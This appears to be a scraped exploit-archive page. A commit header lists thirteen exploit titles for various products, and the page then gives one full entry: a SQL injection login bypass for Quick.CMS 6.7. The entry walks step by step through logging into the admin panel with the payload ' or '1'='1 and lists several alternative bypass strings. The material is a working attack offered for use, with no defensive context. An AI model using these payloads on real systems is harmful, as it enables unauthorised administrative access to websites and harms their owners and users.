bbffa273d4
13 changes to exploits/shellcodes/ghdb TELSAT marKoni FM Transmitter 1.9.5 - Backdoor Account Information Disclosure TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Password TELSAT marKoni FM Transmitter 1.9.5 - Root Command Injection Atlassian Confluence < 8.5.3 - Remote Code Execution Backdrop CMS 1.23.0 - Stored XSS Gibbon LMS < v26.0.00 - Authenticated RCE Quick.CMS 6.7 - SQL Injection Login Bypass TYPO3 11.5.24 - Path Traversal (Authenticated) WEBIGniter v28.7.23 - Stored XSS WordPress File Upload Plugin < 4.23.3 - Stored XSS xbtitFM 4.1.18 - Multiple Vulnerabilities ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE
30 lines
No EOL
809 B
Text
30 lines
No EOL
809 B
Text
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
|
|
# Google Dork: N/A
|
|
# Date: 02-03-2024
|
|
# Exploit Author: ./H4X.Forensics - Diyar
|
|
# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/>
|
|
# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
|
|
# Version: 6.7
|
|
# Tested on: Windows
|
|
# CVE : N/A
|
|
|
|
How to exploit :
|
|
|
|
*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
|
|
*--> Enter any Email like : root@root.com<mailto:root@root.com>
|
|
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
|
|
*--> Tick the Checkbox
|
|
*--> Press Login
|
|
*--> Congratz!
|
|
|
|
*--> SQL Injection Authentication Bypass Payload : ' or '1'='1
|
|
|
|
*--> Payloads Can be use :
|
|
|
|
' or '1'='1
|
|
' or ''='
|
|
' or 1]%00
|
|
' or /* or '
|
|
' or "a" or '
|
|
' or 1 or '
|
|
' or true() or ' |